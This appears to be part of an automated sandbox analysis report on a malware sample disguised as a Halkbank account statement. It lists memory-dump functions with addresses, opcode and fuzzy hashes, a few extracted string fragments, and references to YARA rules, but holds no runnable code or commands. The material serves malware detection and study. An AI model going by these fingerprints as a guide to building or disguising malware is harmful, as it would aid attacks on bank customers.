                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 010020B8 Relevance: .1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f7112e9dc100257bcd23606afa6997948ed6c637b712dfe9e755885226336bac
                                                              • Instruction ID: 0d4ab0325c67b4e84ef5515d7a940a346d76255482941bbf80c1f88c724e31f8
                                                              • Opcode Fuzzy Hash: f7112e9dc100257bcd23606afa6997948ed6c637b712dfe9e755885226336bac
                                                              • Instruction Fuzzy Hash: 0421B035A00106AFDB15DF68C8849EE37A5EF99354F10C55AE94D9B280DF30EA0ACBC2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100FDA8 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a77814e84be27ab254fd15afbaff5f482534325458ab5a1aea334769379cc701
                                                              • Instruction ID: 3a8d0c57ca48ec89d5b4e3952dfe6fba1a7a350d918569c8be526bd310be6d22
                                                              • Opcode Fuzzy Hash: a77814e84be27ab254fd15afbaff5f482534325458ab5a1aea334769379cc701
                                                              • Instruction Fuzzy Hash: 81218531E0024B8BEB26EF68C0556EEBBF1AF48B04F20446DC541BB785CB759D05DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00F6D404 Relevance: .1, Instructions: 75COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220885324.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f6d000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2edd32c32967c627cbdb89e698843e5113c1c875ce1da5562816e854d78aa8bd
                                                              • Instruction ID: 1196138caf3759494f115f0980b3d5d4ed1b89cec21660042b6b938f9a07d701
                                                              • Opcode Fuzzy Hash: 2edd32c32967c627cbdb89e698843e5113c1c875ce1da5562816e854d78aa8bd
                                                              • Instruction Fuzzy Hash: 042103B2E04244EFDB05DF14D9C0B26BF65FB98324F34C669E9090B246C736EC16E6A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01005AC8 Relevance: .1, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 45ea2ab829c9abe001a14746954c47090458784264c391db96c9b9c8beb9a533
                                                              • Instruction ID: 9889c11c2a32397e1a39c4d499b5564d4e3342bac5ee06342d812f3f03453ac1
                                                              • Opcode Fuzzy Hash: 45ea2ab829c9abe001a14746954c47090458784264c391db96c9b9c8beb9a533
                                                              • Instruction Fuzzy Hash: 2221F6357009118FD7269E69C85452EB792FF89750B1441A9E946CB394CF34EC028FC0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00F7D044 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220939560.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f7d000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7bc127565443cabaacdbb97167a785ee522ad86fab5d6a0455c1a43822b866aa
                                                              • Instruction ID: 258a042dd10093a98c028b179b2382b38e3506fe57de41b5e8e8912257ad360d
                                                              • Opcode Fuzzy Hash: 7bc127565443cabaacdbb97167a785ee522ad86fab5d6a0455c1a43822b866aa
                                                              • Instruction Fuzzy Hash: A82103B1904204DFDB10CF24D9C4B26BB75FF84324F64C56AE84D0B245C776D846EA62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06639B40 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14575c7c1b18d73dc27cebb81c41afab9dda533ee9935b8b1fcf57c7a3d46141
                                                              • Instruction ID: e4ba38a8610f2fbef1c47c7c4f85101b8fd16bac9130ecf4902c2eb1c4dce55b
                                                              • Opcode Fuzzy Hash: 14575c7c1b18d73dc27cebb81c41afab9dda533ee9935b8b1fcf57c7a3d46141
                                                              • Instruction Fuzzy Hash: 4611E9327082946FDB866F78582456F7FB7AFC5210B044469E505D73C2DF344D06C3A6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01003A45 Relevance: .1, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5b51648ed16ccc04e306e55afda7f25616ada519f6c5aeb85ad832827199c1c5
                                                              • Instruction ID: c776f9d2f4a2e49e9ec607b16ecaaf7c92b2292810c825ce0cbab3162bb577d5
                                                              • Opcode Fuzzy Hash: 5b51648ed16ccc04e306e55afda7f25616ada519f6c5aeb85ad832827199c1c5
                                                              • Instruction Fuzzy Hash: 6731C478E05209CFCB04EFA8E58489DBBB2FF49305B208569E849AF364DB31AD41CF40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01004E11 Relevance: .1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d3b778eb7af2dd1918fe4763e421f8d2bbb7b7687a393a21cb5a5286106bd2e8
                                                              • Instruction ID: 64eab9ddbae6f90a297fa79846ad3f463535a7b1806169b05d1d021b9db6ea78
                                                              • Opcode Fuzzy Hash: d3b778eb7af2dd1918fe4763e421f8d2bbb7b7687a393a21cb5a5286106bd2e8
                                                              • Instruction Fuzzy Hash: 1721F3317081589FEB12EF68D844B6A3BA2FB88310F104068FA45CB285CB38CD10CBE4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01001F60 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 067cada3ef2f0beee2a2d2da1755a389182d9539ed5b16a0b9f3ee31132793e0
                                                              • Instruction ID: 648af8dcd6e2edb3a9f93399f374ce954eba6558ee507cbbdb13d32ef79c1ee2
                                                              • Opcode Fuzzy Hash: 067cada3ef2f0beee2a2d2da1755a389182d9539ed5b16a0b9f3ee31132793e0
                                                              • Instruction Fuzzy Hash: AA214874C0420A8FCB12EFA8C4581EEBFF1FF59314F2441AAD884B7264EB319A41CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663E510 Relevance: .1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8288415cfe48626533b50b668fc720472b4b2021efa970121989642aae8b6316
                                                              • Instruction ID: 4b83eca8eafa5f046c48e3641881a0cfcc54f36cbe89a9906b551343cdd5d59d
                                                              • Opcode Fuzzy Hash: 8288415cfe48626533b50b668fc720472b4b2021efa970121989642aae8b6316
                                                              • Instruction Fuzzy Hash: 5911E5387092944FD7650E7958641BBBFEBAFCA320B1484B7E146C3286D92A8C0683B1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100E2D1 Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: edd39d2420f476454c13261a4a06def155b75b6690a272205c5cb01e00a2c781
                                                              • Instruction ID: 905ceef5fa3e9e898d5cd2db264791d7acfe8bc0ad4dbb651d5624f13cb13f16
                                                              • Opcode Fuzzy Hash: edd39d2420f476454c13261a4a06def155b75b6690a272205c5cb01e00a2c781
                                                              • Instruction Fuzzy Hash: AB214A70901109DFDB45EFA8D88579EBFF2FB44304F20C6A9E0489B365EB345A468B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00F6D3FF Relevance: .1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220885324.0000000000F6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F6D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f6d000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction ID: 6f0849d2b97ee87ec8481509bfbcdc8f4d32e4c1d857b256f9c289f4cdb8ffec
                                                              • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction Fuzzy Hash: 1D11D376904280DFCB16CF10D5C4B16BF71FB94324F24C6A9D9490B656C33AE85ADBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06639311 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6845ec7b82aa3a1cdea1fdf0263608f71d1d249fe7996e95aed5727cf6ea74b7
                                                              • Instruction ID: fa1936f1b79d2cfa80bc98400e8cf6f08296942ac03ef35a423cd85eeb8292b0
                                                              • Opcode Fuzzy Hash: 6845ec7b82aa3a1cdea1fdf0263608f71d1d249fe7996e95aed5727cf6ea74b7
                                                              • Instruction Fuzzy Hash: 44112A74E00159CFEB00EFE8D860BAEBBB1AB48314F409161E94CA7385E6709E828F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100E2E0 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b0d895eed7287470d2233e1ef2125cdaa191b47f6c0668fcb3d574564d763970
                                                              • Instruction ID: 7e5f78ba3072f7b3306ed451640628c575d5ed0307a8f7d99001dce446401a31
                                                              • Opcode Fuzzy Hash: b0d895eed7287470d2233e1ef2125cdaa191b47f6c0668fcb3d574564d763970
                                                              • Instruction Fuzzy Hash: 72115170D00109DFDB44EFA8D98569EBFF2FF44304F10C6A9E0489B355EB345A459B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01001FB8 Relevance: .1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 04bc8a579136c0f5843b292ef4091a9ab1fa9c493c5b117de3b2fa5f3cb44d51
                                                              • Instruction ID: c6d92080f21baadca22eca35150dfa7e3b9a7888d3fb873d2ac53f94995a7d36
                                                              • Opcode Fuzzy Hash: 04bc8a579136c0f5843b292ef4091a9ab1fa9c493c5b117de3b2fa5f3cb44d51
                                                              • Instruction Fuzzy Hash: E0214774C0460A8FCB11EFA8D5444EEBFF1FF0A300F2041AAD885B7265EB351981CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00F7D03F Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3220939560.0000000000F7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F7D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_f7d000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction ID: 34d5800936e16a6c2413f28b3e99c3f23af3ad1ee277f5f00546431e4f126e08
                                                              • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction Fuzzy Hash: B511BB75904284CFDB11CF10D9C4B15BBB2FB84324F28C6AAD8494B656C33AD84ADB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100565F Relevance: .1, Instructions: 51COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2448f2875d67112dd3ede866e7da05d78f7249f01b67dd91051bff339ac089a5
                                                              • Instruction ID: 9fdf667d1944d21ca41baca86ddc55559cca147b74194ae36e2f14f500eb65db
                                                              • Opcode Fuzzy Hash: 2448f2875d67112dd3ede866e7da05d78f7249f01b67dd91051bff339ac089a5
                                                              • Instruction Fuzzy Hash: 8A01B572700115ABDB129E55DC00BAF3BEADBCC751F248029F555C7284DE7999029B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06632AC1 Relevance: .0, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e70222a51b03f90732bfed3f6065eb3561767be335d92dad04722bfaf8a88943
                                                              • Instruction ID: 7246b452fd8516dc02f779960929a56252957e1dbe51ab1766e60b10826b5fd1
                                                              • Opcode Fuzzy Hash: e70222a51b03f90732bfed3f6065eb3561767be335d92dad04722bfaf8a88943
                                                              • Instruction Fuzzy Hash: 4E019275E002218FCBA0EF78D40895A7BF9EF49355B2005A9E81ADB315E735CD02CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06632A38 Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2712cbc6e391ecdbe6981bced3ceb12412bca123d88f0abfd27f90f277069979
                                                              • Instruction ID: cfd72af6c229cb9b3adf90d3dec6eeb7c0cebaedfcba5bf9894f1c6ba72b2859
                                                              • Opcode Fuzzy Hash: 2712cbc6e391ecdbe6981bced3ceb12412bca123d88f0abfd27f90f277069979
                                                              • Instruction Fuzzy Hash: 6401E470E0022A9FCF54EFB9C8106AEBBB5AF48200F10852AD419E7250E7385A028BD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01002068 Relevance: .0, Instructions: 29COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ab4d233543e305cc12247cda6c560dc49e6e9dcf16538d8425bf7b316c378346
                                                              • Instruction ID: 9f06c2be6a7c9c062da335d92d66f97fec08a80677f5f66751b54b8039c8eccc
                                                              • Opcode Fuzzy Hash: ab4d233543e305cc12247cda6c560dc49e6e9dcf16538d8425bf7b316c378346
                                                              • Instruction Fuzzy Hash: 3BE09232C243AA5BC702A7B098504EEBF389D9222475541B2D058AB042E720268ECBB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01002078 Relevance: .0, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2fb1d0c3021f4a75eddd8d1045f6d6a413cbdddf3866bb9b9845349b3a062575
                                                              • Instruction ID: 2d6707e3fd42b7d1f3103e89c27e73df1d19edefd0e9b4ef59037cf632b731a8
                                                              • Opcode Fuzzy Hash: 2fb1d0c3021f4a75eddd8d1045f6d6a413cbdddf3866bb9b9845349b3a062575
                                                              • Instruction Fuzzy Hash: 67D05B31D2022B97CB11E7A5DC044DFF738EED5265B504626D51837140FB703659C6E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 010082B8 Relevance: .0, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                              • Instruction ID: 81dedf74df996ee8b00fb52072daf04db6bde4f79a284f4bc5eea56833306f5f
                                                              • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                              • Instruction Fuzzy Hash: F5C0807350C1282AB236504E7C41DE7BB8CD3C13B4D114177F95CD3341D8425C4001F4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100A76D Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f2258a460b7e0b90445608039faaba0d8203a4bbd4926a0e29589b59370a43fc
                                                              • Instruction ID: 54ca22bd4c84b457e0f8e3553f8763448b0d0533f6fd05854b939e8747f49292
                                                              • Opcode Fuzzy Hash: f2258a460b7e0b90445608039faaba0d8203a4bbd4926a0e29589b59370a43fc
                                                              • Instruction Fuzzy Hash: 7AD0173AB00008DFCF108F8CE850CDDB7B6FB9C221B008026E911A3260C6319821CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01005F00 Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4559d8efb36addbfa4a37cfd4b2dbcbc6fa954c9d23c0d24c3a46e01ea490b9e
                                                              • Instruction ID: a83c8190285b792b01c9db4f2ad9ab7ccedc0bc60687cf77e2dd5a8b62132387
                                                              • Opcode Fuzzy Hash: 4559d8efb36addbfa4a37cfd4b2dbcbc6fa954c9d23c0d24c3a46e01ea490b9e
                                                              • Instruction Fuzzy Hash: A4D0C27050C3864BC312B3B0E9524543B2AAB82308BB44594BC464E41BE9BD184583A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0100CEFC Relevance: .0, Instructions: 16COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2e8d8e10ce5e0ab68643776b0fe1a3ff7fc02945b5628a2d5702726b74b17558
                                                              • Instruction ID: 0c180a1c2c13fe73fb8d5f5b8515e749763716adde8aa2fc64f162789b0194e4
                                                              • Opcode Fuzzy Hash: 2e8d8e10ce5e0ab68643776b0fe1a3ff7fc02945b5628a2d5702726b74b17558
                                                              • Instruction Fuzzy Hash: 46D04275E4401DCBCF30EFA8E4444DCBBB0EF88316F24546AD965A3211D63155558F11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01005F10 Relevance: .0, Instructions: 12COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 53be99fb8d42f13cd6571b9ef6516ae6d60f42ad444561d752eb61e754cc2a7a
                                                              • Instruction ID: 464bd2bdbec2fc46d5cfb1d2bb7064458664420d288bb0d60a191bbde0b96a14
                                                              • Opcode Fuzzy Hash: 53be99fb8d42f13cd6571b9ef6516ae6d60f42ad444561d752eb61e754cc2a7a
                                                              • Instruction Fuzzy Hash: F9C0127060870A47C655F7F5EA46555371BEBC0304F705A10B80A0B51BEE7C199447D1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 06632D00 Relevance: 23.0, Strings: 18, Instructions: 461COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$0o@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$Lj@p$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                              • API String ID: 0-1947560563
                                                              • Opcode ID: aff9141390fc8226d36ce93a3e988a66a784a6a1eee2237194fd3e9975330164
                                                              • Instruction ID: 09415e3ce12127c4ca9c2ed50d2835c7d1031f31522562202f57a82806368d00
                                                              • Opcode Fuzzy Hash: aff9141390fc8226d36ce93a3e988a66a784a6a1eee2237194fd3e9975330164
                                                              • Instruction Fuzzy Hash: 6232A074E01228CFDB68DF69C984B9DBBB2BF89304F1080A9D809AB354DB755E85CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 06632C57 Relevance: 14.2, Strings: 11, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: "$0o@p$Haq$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q$PH]q
                                                              • API String ID: 0-401091292
                                                              • Opcode ID: fe5122b6414cf98a085eb693b92e6730f0390894e894bfe43644cc7c553d744a
                                                              • Instruction ID: 23638ba8cfb3fed151145abf5ce9284a77fcc73619d83682d36ef02514c4cde4
                                                              • Opcode Fuzzy Hash: fe5122b6414cf98a085eb693b92e6730f0390894e894bfe43644cc7c553d744a
                                                              • Instruction Fuzzy Hash: 1F12D3B4E002188FDB58DF69C994B9DBBF2BF89304F2080A9D409AB354DB755E85CF54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663E5D8 Relevance: 5.1, Strings: 4, Instructions: 131COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-4015495023
                                                              • Opcode ID: c882f589663e9eae0dd2d0a3b834607463ae39c9700074100b4022a389240df6
                                                              • Instruction ID: b9ccfaa96b91a8c341d6333cc1572c93d9b4b90b1d36242dd70d25bfe3b40c3d
                                                              • Opcode Fuzzy Hash: c882f589663e9eae0dd2d0a3b834607463ae39c9700074100b4022a389240df6
                                                              • Instruction Fuzzy Hash: ED411A75E0013B8BEBB48A69C94037FB2A1EF95350F210177C91597381EA31DD82DBE1
